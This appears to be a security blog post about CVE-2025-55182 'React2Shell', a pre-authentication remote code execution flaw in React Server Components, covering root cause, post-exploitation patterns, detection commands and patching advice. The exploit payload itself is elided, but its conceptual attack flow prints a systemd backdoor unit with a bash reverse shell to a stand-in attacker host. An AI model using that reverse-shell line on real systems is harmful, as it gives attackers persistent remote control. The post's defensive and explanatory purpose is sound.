Home / Blog / CVE-2025-55182 React2Shell
CVE-2025-55182 • CVE-2025-66478

React2Shell: CVSS 10.0 Pre-Auth RCE
That Hit 165,000+ Servers

December 2025 14 min read By Boney Warikozi
CVSS 10.0 Critical Remote Code Execution No Auth Required Web Framework Active Campaigns
🚨 Maximum Severity — CVSS 10.0

CVE-2025-55182 carries the maximum possible CVSS score of 10.0. It requires no authentication, no user interaction, and is exploitable over the network. ShadowServer identified over 165,000 vulnerable IPs and 644,000 vulnerable domains. Multiple active malware campaigns are exploiting this flaw right now. Patch or mitigate immediately.

Overview

In late 2025, security researchers uncovered one of the most catastrophic web framework vulnerabilities in recent memory: CVE-2025-55182, nicknamed "React2Shell." This pre-authentication remote code execution vulnerability affects React Server Components (RSC) — the modern, server-side rendering feature used in Next.js, Remix, and other React-based frameworks.

The flaw allows an unauthenticated attacker to send a specially crafted HTTP request that causes the server to execute arbitrary operating system commands. No login, no token, no interaction required — just a network connection to the vulnerable application. With a CVSS score of 10.0 (the maximum), and over 165,000 vulnerable servers identified by ShadowServer, React2Shell is arguably the defining vulnerability of late 2025.

Multiple threat actors quickly weaponized the vulnerability. Within days of disclosure, campaigns dubbed "Emerald" and "Nuts" were deploying Linux cryptominers, backdoors, and persistence mechanisms via automated mass exploitation.

What Are React Server Components?

React Server Components (RSC) represent a paradigm shift in React's rendering model. Unlike traditional client-side React, RSC allows components to be rendered on the server, enabling direct database access, file system operations, and arbitrary Node.js code execution from component code.

This server-side execution model is powerful — but it creates a new attack surface. When a component's server-side logic can be influenced by attacker-controlled input without proper sanitization, the consequences are severe: full server-side code execution.

Technical Details

Root Cause

The vulnerability stems from how RSC serializes and deserializes component props from the network boundary. When a client-side React component calls a Server Action or requests a Server Component over the wire, the framework serializes complex JavaScript objects (including closures and function references) into a wire format.

CVE-2025-55182 exploits insufficient validation of this deserialization process. An attacker can craft a malicious RSC payload that, when deserialized on the server, causes the Node.js process to execute arbitrary system commands. Critically, this doesn't require the application to have an authenticated route — public-facing Server Actions are equally vulnerable.

Conceptual Attack Flow
# Attacker sends malicious RSC payload to any Server Action endpoint
POST /app/server-action HTTP/1.1
Host: vulnerable-nextjs-app.com
Content-Type: text/x-component
Next-Action: <action-id>

["$@1","$@2",{"$$typeof":"$","value":"...MALICIOUS_PAYLOAD..."}]

# Server deserializes payload and executes attacker-controlled code
# Result: RCE as the Node.js process user

# Post-exploitation — persistence via systemd
cat /etc/systemd/system/backdoor.service
# [Service]
# ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
# [Install]
# WantedBy=multi-user.target

Post-Exploitation Activity

Trend Micro and Unit 42 researchers observed consistent post-exploitation patterns across confirmed React2Shell intrusions:

  • Rapid deployment of Linux loaders — custom ELF binaries designed to download and execute additional payloads
  • Persistence mechanisms: systemd service units, cron jobs, and rc.local entries to survive reboots
  • Node.js abuse: Covert installation of Node.js in hidden directories with obfuscated JavaScript backdoors
  • Cryptomining: XMRig and custom Monero miners deployed on compromised servers
  • Credential harvesting: Scanning for environment variables, .env files, and AWS metadata endpoints to steal credentials
  • Lateral movement: Using stolen cloud credentials to pivot to other services and accounts

Scale of Impact

"ShadowServer Foundation identified over 165,000 vulnerable IP addresses and 644,000 domains as of December 8, 2025." — Unit 42 / Palo Alto Networks

The scale of potential impact is staggering. React and Next.js are among the most widely used web frameworks in the world, powering everything from small startups to Fortune 500 e-commerce platforms, SaaS applications, and government portals.

The "Emerald" campaign alone compromised over 10,000 servers in its first week, primarily targeting cloud-hosted Node.js applications running Next.js with SSR (Server-Side Rendering) enabled.

Detection

Detecting React2Shell exploitation requires monitoring at both the application and infrastructure level.

Detection — Application Logs
# Look for malformed RSC payloads in Next.js access logs
grep -i "text/x-component\|Next-Action" access.log

# Suspicious outbound connections from Node.js process
ss -tulnp | grep node
netstat -antp | grep ESTABLISHED | grep node

# Hidden Node.js installations
find / -name "node" -o -name "npm" 2>/dev/null | grep -v "/usr/"

# Suspicious systemd services added recently
find /etc/systemd/system/ -newer /tmp/baseline -name "*.service"

# Check for XMRig or mining processes
ps aux | grep -E "xmrig|minerd|cryptonight"

Network Indicators

  • Outbound connections to known XMRig mining pools (e.g., pool.hashvault.pro, xmr.pool.minergate.com)
  • Unexpected outbound connections to high-numbered ports from web server processes
  • DNS queries for known C2 infrastructure associated with the Emerald/Nuts campaigns
  • Large POST requests to /_next/ paths with Content-Type: text/x-component

Remediation

✓ Patching — Apply Framework Updates Immediately
  • Update Next.js to the patched version (check Next.js Security Advisories for the exact fixed version)
  • Update any other RSC-based frameworks (Remix, Astro with RSC) to their latest patched releases
  • Audit your package.json and run npm audit / pnpm audit
  • Lock dependency versions and enable automated dependency update tools (Dependabot, Renovate)
⚠ Hardening & Mitigations
  • Restrict Server Actions: Implement authentication checks on all Server Actions, even those you consider "public"
  • Input validation at the boundary: Never trust data arriving from the client wire format — validate and sanitize all inputs before deserialization
  • WAF rules: Block or alert on POST requests to RSC endpoints (/_next/, /app/) with unexpected Content-Type: text/x-component headers
  • Least privilege for Node.js: Run your Node.js application as a non-root user with minimal file system permissions
  • Container isolation: Use Docker/Podman containers with read-only root filesystems and no network egress except to required services
  • Monitor environment: Alert on new files in application directories and unexpected process spawning from Node.js

Broader Security Lessons

React2Shell carries lessons that extend far beyond this specific CVE:

Server-Side Execution Is a Double-Edged Sword

React Server Components are powerful precisely because they execute on the server with access to databases, file systems, and environment variables. This power requires proportionate security scrutiny. Every new server-side execution surface is a potential code execution vector if inputs are not rigorously validated.

Framework Updates Are Security Updates

Many organizations treat framework upgrades as risky and defer them. React2Shell demonstrates that deferring framework updates is itself a critical security risk. JavaScript frameworks are attack surface — their update cadence is your patch cadence.

Zero Trust for Application Layers

Zero Trust at the application layer means: never trust input, even from your own framework's wire protocol. Every boundary crossing — client to server, service to service — should be treated as potentially hostile and validated accordingly.

Conclusion

CVE-2025-55182 "React2Shell" is a watershed moment for web application security. A CVSS 10.0 pre-authentication RCE in one of the world's most popular web frameworks, actively exploited across hundreds of thousands of servers, demonstrates the critical importance of:

  • Treating framework updates as security-critical events
  • Implementing defense-in-depth at the application layer (input validation, auth on all server-side actions, WAF)
  • Running applications with least privilege
  • Monitoring application behavior for signs of compromise, not just network perimeter

The modern web stack is complex and moves fast. Security must move just as fast. If your Next.js application hasn't been patched, stop reading and go update it now.

// References